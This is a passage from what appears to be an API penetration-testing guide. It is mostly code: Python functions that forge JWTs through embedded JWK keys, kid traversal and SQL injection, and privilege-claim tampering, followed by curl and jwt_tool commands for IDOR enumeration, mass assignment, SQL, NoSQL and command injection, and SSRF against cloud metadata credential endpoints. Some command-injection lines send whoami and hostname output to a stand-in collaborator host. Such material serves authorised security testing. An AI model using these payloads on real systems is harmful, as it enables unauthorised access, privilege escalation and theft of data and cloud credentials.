(CVE-2018-0114) </span><span class="k">def</span> <span class="nf">generate_jwk_injection</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="n">private_key_pem</span><span class="p">,</span> <span class="n">public_key_pem</span><span class="p">):</span> <span class="sh">"""</span><span class="s"> Craft a JWT that includes a malicious JWK in the header. If the server trusts the embedded JWK, it validates against YOUR key. </span><span class="sh">"""</span> <span class="kn">from</span> <span class="n">cryptography.hazmat.primitives</span> <span class="kn">import</span> <span class="n">serialization</span> <span class="kn">from</span> <span class="n">cryptography.hazmat.primitives.asymmetric</span> <span class="kn">import</span> <span class="n">rsa</span> <span class="kn">from</span> <span class="n">cryptography.hazmat.backends</span> <span class="kn">import</span> <span class="n">default_backend</span> <span class="c1"># Load your RSA key </span> <span class="n">private_key</span> <span class="o">=</span> <span class="n">serialization</span><span class="p">.</span><span class="nf">load_pem_private_key</span><span class="p">(</span> <span class="n">private_key_pem</span><span class="p">.</span><span class="nf">encode</span><span class="p">(),</span> <span class="n">password</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">backend</span><span class="o">=</span><span class="nf">default_backend</span><span class="p">()</span> <span class="p">)</span> <span class="n">public_key</span> <span class="o">=</span> <span class="n">private_key</span><span class="p">.</span><span class="nf">public_key</span><span class="p">()</span> <span class="n">public_numbers</span> <span class="o">=</span> <span class="n">public_key</span><span class="p">.</span><span class="nf">public_numbers</span><span class="p">()</span> <span class="c1"># Convert to base64url </span> <span class="n">n</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="nf">urlsafe_b64encode</span><span class="p">(</span><span class="n">public_numbers</span><span class="p">.</span><span class="n">n</span><span class="p">.</span><span class="nf">to_bytes</span><span class="p">((</span><span class="n">public_numbers</span><span class="p">.</span><span class="n">n</span><span class="p">.</span><span class="nf">bit_length</span><span class="p">()</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)</span> <span class="o">//</span> <span class="mi">8</span><span class="p">,</span> <span class="sh">'</span><span class="s">big</span><span class="sh">'</span><span class="p">)).</span><span class="nf">rstrip</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">=</span><span class="sh">'</span><span class="p">).</span><span class="nf">decode</span><span class="p">()</span> <span class="n">e</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="nf">urlsafe_b64encode</span><span class="p">(</span><span class="n">public_numbers</span><span class="p">.</span><span class="n">e</span><span class="p">.</span><span class="nf">to_bytes</span><span class="p">((</span><span class="n">public_numbers</span><span class="p">.</span><span class="n">e</span><span class="p">.</span><span class="nf">bit_length</span><span class="p">()</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)</span> <span class="o">//</span> <span class="mi">8</span><span class="p">,</span> <span class="sh">'</span><span class="s">big</span><span class="sh">'</span><span class="p">)).</span><span class="nf">rstrip</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">=</span><span class="sh">'</span><span class="p">).</span><span class="nf">decode</span><span class="p">()</span> <span class="n">jwk</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">kty</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">RSA</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">n</span><span class="sh">"</span><span class="p">:</span> <span class="n">n</span><span class="p">,</span> <span class="sh">"</span><span class="s">e</span><span class="sh">"</span><span class="p">:</span> <span class="n">e</span><span class="p">,</span> <span class="sh">"</span><span class="s">alg</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">RS256</span><span class="sh">"</span> <span class="p">}</span> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">alg</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">RS256</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">typ</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">JWT</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">jwk</span><span class="sh">"</span><span class="p">:</span> <span class="n">jwk</span> <span class="p">}</span> <span class="n">forged</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">encode</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="n">private_key_pem</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="sh">"</span><span class="s">RS256</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> <span class="k">return</span> <span class="n">forged</span> <span class="c1"># Technique 4: Kid injection (directory traversal / SQL injection) </span><span class="k">def</span> <span class="nf">kid_injection</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="n">injection_payload</span><span class="o">=</span><span class="sh">"</span><span class="s">../../dev/null</span><span class="sh">"</span><span class="p">):</span> <span class="sh">"""</span><span class="s"> kid: </span><span class="sh">"</span><span class="s">../../dev/null</span><span class="sh">"</span><span class="s"> means empty signature validation kid: </span><span class="sh">"</span><span class="s">/proc/sys/kernel/random/uuid</span><span class="sh">"</span><span class="s"> for DoS testing kid: </span><span class="sh">"</span><span class="s">keyfile|../../etc/passwd</span><span class="sh">"</span><span class="s"> for command injection </span><span class="sh">"""</span> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">alg</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">typ</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">JWT</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">kid</span><span class="sh">"</span><span class="p">:</span> <span class="n">injection_payload</span> <span class="p">}</span> <span class="n">forged</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">encode</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="sh">""</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> <span class="k">return</span> <span class="n">forged</span> <span class="c1"># Technique 5: Expired token acceptance </span><span class="k">def</span> <span class="nf">test_expired_token</span><span class="p">(</span><span class="n">token</span><span class="p">):</span> <span class="sh">"""</span><span class="s">Test if expired tokens are still accepted</span><span class="sh">"""</span> <span class="n">decoded</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">options</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">verify_exp</span><span class="sh">"</span><span class="p">:</span> <span class="bp">False</span><span class="p">})</span> <span class="c1"># Modify exp to past date </span> <span class="kn">import</span> <span class="n">time</span> <span class="n">decoded</span><span class="p">[</span><span class="sh">"</span><span class="s">exp</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="n">time</span><span class="p">.</span><span class="nf">time</span><span class="p">())</span> <span class="o">-</span> <span class="mi">3600</span> <span class="c1"># 1 hour ago </span> <span class="n">headers</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">get_unverified_header</span><span class="p">(</span><span class="n">token</span><span class="p">)</span> <span class="n">forged</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">encode</span><span class="p">(</span><span class="n">decoded</span><span class="p">,</span> <span class="sh">""</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="n">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">alg</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">),</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> <span class="k">return</span> <span class="n">forged</span> <span class="c1"># Technique 6: Sub claim manipulation (vertical privilege escalation) </span><span class="k">def</span> <span class="nf">escalate_privilege</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">target_role</span><span class="o">=</span><span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">):</span> <span class="sh">"""</span><span class="s">Modify the </span><span class="sh">'</span><span class="s">sub</span><span class="sh">'</span><span class="s">, </span><span class="sh">'</span><span class="s">role</span><span class="sh">'</span><span class="s">, or custom claims for privilege escalation</span><span class="sh">"""</span> <span class="n">decoded</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">options</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">verify_exp</span><span class="sh">"</span><span class="p">:</span> <span class="bp">False</span><span class="p">})</span> <span class="n">headers</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">get_unverified_header</span><span class="p">(</span><span class="n">token</span><span class="p">)</span> <span class="c1"># Common privilege claims </span> <span class="n">privilege_claims</span> <span class="o">=</span> <span class="p">[</span><span class="sh">"</span><span class="s">role</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">roles</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">is_admin</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">privilege</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">privileges</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">permissions</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">scope</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">scopes</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">group</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">groups</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">type</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">user_type</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">account_type</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">access_level</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">level</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">tier</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">plan</span><span class="sh">"</span><span class="p">]</span> <span class="k">for</span> <span class="n">claim</span> <span class="ow">in</span> <span class="n">privilege_claims</span><span class="p">:</span> <span class="k">if</span> <span class="n">claim</span> <span class="ow">in</span> <span class="n">decoded</span><span class="p">:</span> <span class="n">decoded</span><span class="p">[</span><span class="n">claim</span><span class="p">]</span> <span class="o">=</span> <span class="n">target_role</span> <span class="k">if</span> <span class="nf">isinstance</span><span class="p">(</span><span class="n">decoded</span><span class="p">[</span><span class="n">claim</span><span class="p">],</span> <span class="nb">str</span><span class="p">)</span> <span class="k">else</span> <span class="p">[</span><span class="n">target_role</span><span class="p">]</span> <span class="c1"># Also try adding privileged claims </span> <span class="n">decoded</span><span class="p">[</span><span class="sh">"</span><span class="s">role</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span> <span class="n">decoded</span><span class="p">[</span><span class="sh">"</span><span class="s">is_admin</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="bp">True</span> <span class="n">decoded</span><span class="p">[</span><span class="sh">"</span><span class="s">permissions</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="p">[</span><span class="sh">"</span><span class="s">*</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">read:all</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">write:all</span><span class="sh">"</span><span class="p">]</span> <span class="k">return</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">encode</span><span class="p">(</span><span class="n">decoded</span><span class="p">,</span> <span class="n">token</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sh">'</span><span class="s">.</span><span class="sh">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">],</span> <span class="n">algorithm</span><span class="o">=</span><span class="n">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">alg</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">),</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> <span class="c1"># Technique 7: Key ID (kid) with SQL injection </span><span class="k">def</span> <span class="nf">kid_sql_injection</span><span class="p">(</span><span class="n">payload</span><span class="p">):</span> <span class="sh">"""</span><span class="s">If kid is used in a SQL query, inject SQL</span><span class="sh">"""</span> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">alg</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">typ</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">JWT</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">kid</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"'</span><span class="s"> UNION SELECT </span><span class="sh">'</span><span class="s">1</span><span class="sh">'</span><span class="s"> -- </span><span class="sh">"</span> <span class="p">}</span> <span class="n">forged</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">encode</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="sh">"</span><span class="s">1</span><span class="sh">"</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> <span class="k">return</span> <span class="n">forged</span> </code></pre> </div> <h4> Using jwt_tool </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Using jwt_tool for comprehensive JWT testing</span> python3 jwt_tool.py <span class="nv">$TOKEN</span> <span class="nt">-T</span> <span class="c"># Tamper with token</span> python3 jwt_tool.py <span class="nv">$TOKEN</span> <span class="nt">-X</span> a <span class="c"># Algorithm 'none' attack</span> python3 jwt_tool.py <span class="nv">$TOKEN</span> <span class="nt">-X</span> c <span class="c"># Algorithm confusion (RS256→HS256)</span> python3 jwt_tool.py <span class="nv">$TOKEN</span> <span class="nt">-X</span> i <span class="c"># Inject JWK</span> python3 jwt_tool.py <span class="nv">$TOKEN</span> <span class="nt">-X</span> k <span class="c"># Kid injection</span> python3 jwt_tool.py <span class="nv">$TOKEN</span> <span class="nt">-X</span> e <span class="c"># Exploit expired token</span> <span class="c"># Scan for JWT vulnerabilities</span> python3 jwt_tool.py <span class="nt">-t</span> <span class="s2">"https://api.target.com/v1/endpoint"</span> <span class="nt">-rc</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> </code></pre> </div> <h4> API Key Leakage via Referer / Origin / Path </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Check if API keys leak in referer headers</span> curl <span class="nt">-s</span> https://api.target.com/v1/endpoint <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Referer: https://api.target.com/v1/users?api_key=test123"</span> <span class="c"># Check if API keys are accepted in URL parameters</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?api_key=test123"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?key=test123"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?token=test123"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?access_token=test123"</span> <span class="c"># Check if API key works in headers</span> curl <span class="nt">-s</span> https://api.target.com/v1/users <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"X-API-Key: test123"</span> curl <span class="nt">-s</span> https://api.target.com/v1/users <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"API-Key: test123"</span> curl <span class="nt">-s</span> https://api.target.com/v1/users <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"X-Api-Key: test123"</span> curl <span class="nt">-s</span> https://api.target.com/v1/users <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"X-APIKEY: test123"</span> </code></pre> </div> <h3> 3.2 Authorization Testing — IDOR &amp; BOLA </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Sequential ID enumeration</span> <span class="k">for </span><span class="nb">id </span><span class="k">in</span> <span class="si">$(</span><span class="nb">seq </span>1 100<span class="si">)</span><span class="p">;</span> <span class="k">do </span><span class="nv">response</span><span class="o">=</span><span class="si">$(</span>curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users/</span><span class="nv">$id</span><span class="s2">"</span><span class="si">)</span> <span class="nv">email</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="s2">"</span><span class="nv">$response</span><span class="s2">"</span> | jq <span class="nt">-r</span> <span class="s1">'.email // empty'</span> 2&gt;/dev/null<span class="si">)</span> <span class="k">if</span> <span class="o">[</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$email</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then </span><span class="nb">echo</span> <span class="s2">"User </span><span class="nv">$id</span><span class="s2">: </span><span class="nv">$email</span><span class="s2">"</span> <span class="k">fi done</span> <span class="c"># UUID enumeration (less likely but test)</span> ffuf <span class="nt">-u</span> https://api.target.com/v1/orders/FUZZ <span class="se">\</span> <span class="nt">-w</span> /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-mc</span> 200,403,401 <span class="c"># Mass IDOR via parameter pollution</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/invoices?id=1&amp;id=2&amp;id=3"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/invoices?id[]=1&amp;id[]=2&amp;id[]=3"</span> <span class="c"># Test IDOR on different object types</span> <span class="k">for </span>object <span class="k">in </span><span class="nb">users </span>orders invoices payments tickets messages comments posts profiles accounts transactions<span class="p">;</span> <span class="k">do for </span><span class="nb">id </span><span class="k">in </span>1 2 3<span class="p">;</span> <span class="k">do </span>curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/</span><span class="nv">$object</span><span class="s2">/</span><span class="nv">$id</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> | jq <span class="s1">'. | select(. != null)'</span> <span class="k">done done</span> <span class="c"># IDOR via path traversal in object reference</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/orders/../users/1"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/orders/..%2Fusers%2F1"</span> <span class="c"># Test for wildcard object references</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users/*"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users/all"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users/%00"</span> </code></pre> </div> <h4> Mass Assignment Testing </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Test for mass assignment on POST/PUT endpoints</span> curl <span class="nt">-X</span> PUT https://api.target.com/v1/users/me <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{ "name": "test", "role": "admin", "is_admin": true, "is_verified": true, "is_active": true, "balance": 999999999, "email_verified": true, "account_status": "active", "tier": "enterprise", "permissions": ["*"], "credits": 999999, "plan": "premium", "subscription": "unlimited", "admin": true, "privileged": true }'</span> <span class="c"># Test mass assignment on POST endpoints</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/users <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{ "email": "attacker@test.com", "password": "Password123!", "role": "admin", "is_admin": true, "admin": true, "privileged": true }'</span> <span class="c"># Test mass assignment via URL parameters</span> curl <span class="nt">-X</span> POST <span class="s2">"https://api.target.com/v1/users?role=admin&amp;is_admin=true"</span> </code></pre> </div> <h4> Broken Function Level Authorization (BFLA) </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Vertical privilege escalation — lower privilege user accessing admin functions</span> <span class="c"># Replace user role token and test admin endpoints</span> curl <span class="nt">-s</span> https://api.target.com/v1/admin/users <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="si">$(</span><span class="nb">cat </span>low_priv_token.txt<span class="si">)</span><span class="s2">"</span> <span class="c"># Test all admin endpoints with low-priv token</span> <span class="k">for </span>endpoint <span class="k">in </span>admin manage dashboard config settings system logs metrics reports <span class="nb">users </span>roles permissions audit<span class="p">;</span> <span class="k">do for </span>action <span class="k">in </span><span class="nb">users </span>config logs settings metrics reports<span class="p">;</span> <span class="k">do </span>curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/</span><span class="nv">$endpoint</span><span class="s2">/</span><span class="nv">$action</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="si">$(</span><span class="nb">cat </span>low_priv_token.txt<span class="si">)</span><span class="s2">"</span> <span class="k">done done</span> <span class="c"># Test HTTP method override for privilege escalation</span> curl <span class="nt">-s</span> https://api.target.com/v1/users <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="si">$(</span><span class="nb">cat </span>low_priv_token.txt<span class="si">)</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"X-HTTP-Method-Override: DELETE"</span> <span class="c"># Test hidden admin parameters</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?admin=true"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?isAdmin=true"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?debug=true"</span> </code></pre> </div> <h2> Phase 4: Injection Attacks on APIs </h2> <h3> 4.1 SQL Injection in API Parameters </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Classic SQLi in API</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?id=1' OR '1'='1"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?id=1' OR '1'='1'--"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?id=1' UNION SELECT @@version--"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?id=1 UNION SELECT 1,2,3,4,5,@@version,7,8,9,10"</span> <span class="c"># Time-based blind SQLi</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?id=1' WAITFOR DELAY '00:00:05'--"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?id=1' AND SLEEP(5)--"</span> <span class="c"># Error-based SQLi</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?id=1' AND 1=CONVERT(int,@@version)--"</span> <span class="c"># JSON-based SQLi</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/search <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"query": "test'</span> OR <span class="s1">'1'</span><span class="o">=</span><span class="s1">'1"}'</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/search <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"query": "test'</span> UNION SELECT @@version--<span class="s2">"}' # SQLi in nested JSON curl -X POST https://api.target.com/v1/search </span><span class="se">\</span><span class="s2"> -H "</span>Content-Type: application/json<span class="s2">" </span><span class="se">\</span><span class="s2"> -d '{"</span>filters<span class="s2">": {"</span><span class="nb">id</span><span class="s2">": "</span>1<span class="s1">' OR '</span>1<span class="s1">'='</span>1<span class="s2">"}}' # SQLi in array parameters curl -s "</span>https://api.target.com/v1/users?ids[]<span class="o">=</span>1&amp;ids[]<span class="o">=</span>2<span class="s1">' OR '</span>1<span class="s1">'='</span>1<span class="s2">" </span></code></pre> </div> <h4> NoSQL Injection (MongoDB) </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># NoSQL Injection — login bypass</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/login <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"username": "admin", "password": {"$ne": ""}}'</span> <span class="c"># NoSQL injection — extract data with $regex</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/users <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"username": {"$regex": ".*"}, "password": {"$ne": ""}}'</span> <span class="c"># NoSQL injection — boolean-based</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?username[</span><span class="nv">$ne</span><span class="s2">]=nonexistent&amp;password[</span><span class="nv">$ne</span><span class="s2">]=nonexistent"</span> <span class="c"># NoSQL injection — $where operator</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/search <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"$where": "sleep(5000)"}'</span> <span class="c"># NoSQL injection — $gt operator for data extraction</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users?created_at[</span><span class="nv">$gt</span><span class="s2">]=2020-01-01"</span> </code></pre> </div> <h3> 4.2 Command Injection </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Command injection in API parameters</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/utils/ping?host=127.0.0.1;id"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/utils/ping?host=127.0.0.1|id"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/utils/ping?host=127.0.0.1</span><span class="si">$(</span><span class="nb">id</span><span class="si">)</span><span class="s2">"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/utils/ping?host=</span><span class="sb">`</span><span class="nb">id</span><span class="sb">`</span><span class="s2">"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/exports?format=csv;cat /etc/passwd"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/exports?format=csv|cat /etc/passwd"</span> <span class="c"># Blind command injection with out-of-band detection</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/convert?file=/tmp/test|curl http://COLLABORATOR.net/</span><span class="si">$(</span><span class="nb">whoami</span><span class="si">)</span><span class="s2">"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/convert?file=/tmp/test||curl http://COLLABORATOR.net/</span><span class="si">$(</span><span class="nb">hostname</span><span class="si">)</span><span class="s2">"</span> <span class="c"># Command injection in headers</span> curl <span class="nt">-s</span> https://api.target.com/v1/upload <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"User-Agent: test';id;'"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"X-Forwarded-For: 127.0.0.1;id;"</span> <span class="c"># Command injection in JSON body</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/process <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"file": "test.txt; id"}'</span> <span class="c"># Command injection via filename upload</span> curl <span class="nt">-X</span> POST https://api.target.com/v1/upload <span class="se">\</span> <span class="nt">-F</span> <span class="s2">"file=@test.txt;filename=test.txt;id;.txt"</span> </code></pre> </div> <h3> 4.3 SSRF (Server-Side Request Forgery) </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Basic SSRF</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/proxy?url=http://169.254.169.254/latest/meta-data/"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/proxy?url=http://127.0.0.1:8080/admin"</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/avatar?url=http://127.0.0.1:8080/admin"</span> <span class="c"># Blind SSRF via Collaborator</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/webhook?url=http://COLLABORATOR.net/test"</span> <span class="c"># SSRF via cloud metadata endpoints</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/import?url=http://169.254.169.254/"</span> <span class="c"># AWS</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/import?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"</span> <span class="c"># AWS IAM</span> curl <span class="nt">-s</span> <span 